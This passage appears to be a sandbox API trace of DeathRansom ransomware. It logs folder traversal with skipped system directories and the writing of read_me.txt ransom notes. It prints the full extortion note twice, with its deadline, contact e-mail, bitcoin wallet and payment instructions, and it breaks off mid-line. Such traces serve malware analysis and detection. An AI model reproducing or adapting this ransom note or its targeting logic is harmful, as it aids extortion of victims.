GetProcessHeap () returned 0x4f10000 [0076.310] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d510b8 | out: hHeap=0x4f10000) returned 1 [0076.333] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0076.333] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Local Settings") returned 35 [0076.333] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0076.333] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0076.333] StrStrW (lpFirst="local settings", lpSrch="programdata") returned 0x0 [0076.333] StrStrW (lpFirst="local settings", lpSrch="$recycle.bin") returned 0x0 [0076.333] StrStrW (lpFirst="local settings", lpSrch="program files") returned 0x0 [0076.333] StrStrW (lpFirst="local settings", lpSrch="windows") returned 0x0 [0076.333] StrStrW (lpFirst="local settings", lpSrch="all users") returned 0x0 [0076.333] StrStrW (lpFirst="local settings", lpSrch="appdata") returned 0x0 [0076.333] GetProcessHeap () returned 0x4f10000 [0076.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b10090 [0076.333] lstrcpyW (in: lpString1=0x8b10090, lpString2="\\\\?\\C:\\Users\\Default\\Local Settings" | out: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings") returned="\\\\?\\C:\\Users\\Default\\Local Settings" [0076.333] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 109 [0076.333] QueueUserWorkItem (Function=0x40a710, Context=0x8b10090, Flags=0x0) returned 1 [0076.333] GetProcessHeap () returned 0x4f10000 [0076.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0076.333] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Local Settings\\*") returned 37 [0076.333] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="RecentPlaces.lnk", cAlternateFileName="\x07")) returned 0xffffffff [0076.333] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Local Settings\\read_me.txt") returned 47 [0076.333] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Local Settings\\read_me.txt" (normalized: "c:\\users\\default\\local settings\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0076.335] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.335] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.335] CloseHandle (hObject=0x7a0) returned 1 [0076.336] GetProcessHeap () returned 0x4f10000 [0076.336] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e31128 | out: hHeap=0x4f10000) returned 1 [0076.336] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Music", cAlternateFileName="")) returned 1 [0076.336] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music") returned 26 [0076.336] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0076.336] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0076.336] StrStrW (lpFirst="music", lpSrch="programdata") returned 0x0 [0076.336] StrStrW (lpFirst="music", lpSrch="$recycle.bin") returned 0x0 [0076.336] StrStrW (lpFirst="music", lpSrch="program files") returned 0x0 [0076.336] StrStrW (lpFirst="music", lpSrch="windows") returned 0x0 [0076.336] StrStrW (lpFirst="music", lpSrch="all users") returned 0x0 [0076.336] StrStrW (lpFirst="music", lpSrch="appdata") returned 0x0 [0076.336] GetProcessHeap () returned 0x4f10000 [0076.336] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8e31128 [0076.336] lstrcpyW (in: lpString1=0x8e31128, lpString2="\\\\?\\C:\\Users\\Default\\Music" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music") returned="\\\\?\\C:\\Users\\Default\\Music" [0076.336] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 110 [0076.336] QueueUserWorkItem (Function=0x40a710, Context=0x8e31128, Flags=0x0) returned 1 [0076.336] GetProcessHeap () returned 0x4f10000 [0076.336] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ba00d8 [0076.337] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\*") returned 28 [0076.337] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Music\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.338] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\.") returned 28 [0076.338] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.338] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.338] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.338] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\..") returned 29 [0076.338] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.338] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.338] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\desktop.ini") returned 38 [0076.338] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24eadda0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.338] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\read_me.txt") returned 38 [0076.338] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24eadda0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0076.338] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.338] wnsprintfW (in: pszDest=0x8ba00d8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\Music\\read_me.txt") returned 38 [0076.338] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Music\\read_me.txt" (normalized: "c:\\users\\default\\music\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.338] GetProcessHeap () returned 0x4f10000 [0076.338] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ba00d8 | out: hHeap=0x4f10000) returned 1 [0076.338] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0076.338] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\My Documents") returned 33 [0076.338] lstrcmpW (lpString1="My Documents", lpString2="..") returned 1 [0076.338] lstrcmpW (lpString1="My Documents", lpString2=".") returned 1 [0076.338] StrStrW (lpFirst="my documents", lpSrch="programdata") returned 0x0 [0076.338] StrStrW (lpFirst="my documents", lpSrch="$recycle.bin") returned 0x0 [0076.338] StrStrW (lpFirst="my documents", lpSrch="program files") returned 0x0 [0076.338] StrStrW (lpFirst="my documents", lpSrch="windows") returned 0x0 [0076.339] StrStrW (lpFirst="my documents", lpSrch="all users") returned 0x0 [0076.339] StrStrW (lpFirst="my documents", lpSrch="appdata") returned 0x0 [0076.339] GetProcessHeap () returned 0x4f10000 [0076.339] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ba00d8 [0076.339] lstrcpyW (in: lpString1=0x8ba00d8, lpString2="\\\\?\\C:\\Users\\Default\\My Documents" | out: lpString1="\\\\?\\C:\\Users\\Default\\My Documents") returned="\\\\?\\C:\\Users\\Default\\My Documents" [0076.339] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 111 [0076.339] QueueUserWorkItem (Function=0x40a710, Context=0x8ba00d8, Flags=0x0) returned 1 [0076.339] GetProcessHeap () returned 0x4f10000 [0076.339] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bb00e0 [0076.340] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\My Documents\\*") returned 35 [0076.340] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24eadda0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0076.340] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\My Documents\\read_me.txt") returned 45 [0076.340] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\My Documents\\read_me.txt" (normalized: "c:\\users\\default\\my documents\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.340] GetProcessHeap () returned 0x4f10000 [0076.340] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8bb00e0 | out: hHeap=0x4f10000) returned 1 [0076.340] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NetHood", cAlternateFileName="")) returned 1 [0076.340] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NetHood") returned 28 [0076.340] lstrcmpW (lpString1="NetHood", lpString2="..") returned 1 [0076.340] lstrcmpW (lpString1="NetHood", lpString2=".") returned 1 [0076.340] StrStrW (lpFirst="nethood", lpSrch="programdata") returned 0x0 [0076.340] StrStrW (lpFirst="nethood", lpSrch="$recycle.bin") returned 0x0 [0076.340] StrStrW (lpFirst="nethood", lpSrch="program files") returned 0x0 [0076.340] StrStrW (lpFirst="nethood", lpSrch="windows") returned 0x0 [0076.340] StrStrW (lpFirst="nethood", lpSrch="all users") returned 0x0 [0076.340] StrStrW (lpFirst="nethood", lpSrch="appdata") returned 0x0 [0076.340] GetProcessHeap () returned 0x4f10000 [0076.340] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bb00e0 [0076.340] lstrcpyW (in: lpString1=0x8bb00e0, lpString2="\\\\?\\C:\\Users\\Default\\NetHood" | out: lpString1="\\\\?\\C:\\Users\\Default\\NetHood") returned="\\\\?\\C:\\Users\\Default\\NetHood" [0076.340] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 112 [0076.340] QueueUserWorkItem (Function=0x40a710, Context=0x8bb00e0, Flags=0x0) returned 1 [0076.341] GetProcessHeap () returned 0x4f10000 [0076.341] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bc00e8 [0076.341] wnsprintfW (in: pszDest=0x8bc00e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\NetHood\\*") returned 30 [0076.341] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24eadda0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24eadda0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24eadda0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="read_me.txt", cAlternateFileName="廠疙휎᥵?\x17甴?\x17a")) returned 0xffffffff [0076.342] wnsprintfW (in: pszDest=0x8bc00e8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Default\\NetHood\\read_me.txt") returned 40 [0076.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NetHood\\read_me.txt" (normalized: "c:\\users\\default\\nethood\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a0 [0076.342] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.342] WriteFile (in: hFile=0x7a0, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.343] CloseHandle (hObject=0x7a0) returned 1 [0076.343] GetProcessHeap () returned 0x4f10000 [0076.343] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8bc00e8 | out: hHeap=0x4f10000) returned 1 [0076.343] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6770de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x6770de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0076.343] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT") returned 31 [0076.343] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0xc103692e, ftCreationTime.dwHighDateTime=0x1ca0451, ftLastAccessTime.dwLowDateTime=0x1dd1880d, ftLastAccessTime.dwHighDateTime=0x1cbf8ec, ftLastWriteTime.dwLowDateTime=0x1dd1880d, ftLastWriteTime.dwHighDateTime=0x1cbf8ec, nFileSizeHigh=0x0, nFileSizeLow=0x400, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NTUSER.DAT.LOG", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0076.343] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0076.343] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x674ac80, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2e400, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0076.343] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0076.343] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x9012aa61, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0x9012aa61, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0076.343] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0076.343] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8d30919, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8d30919, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8ead6dc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0076.343] wnsprintfW (in: pszDest=0x8b900d0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0076.343] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8da2d3a, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8da2d3a, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8e8757c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0076.344] wnsprintfW (in: pszDest=0x8b900d0, 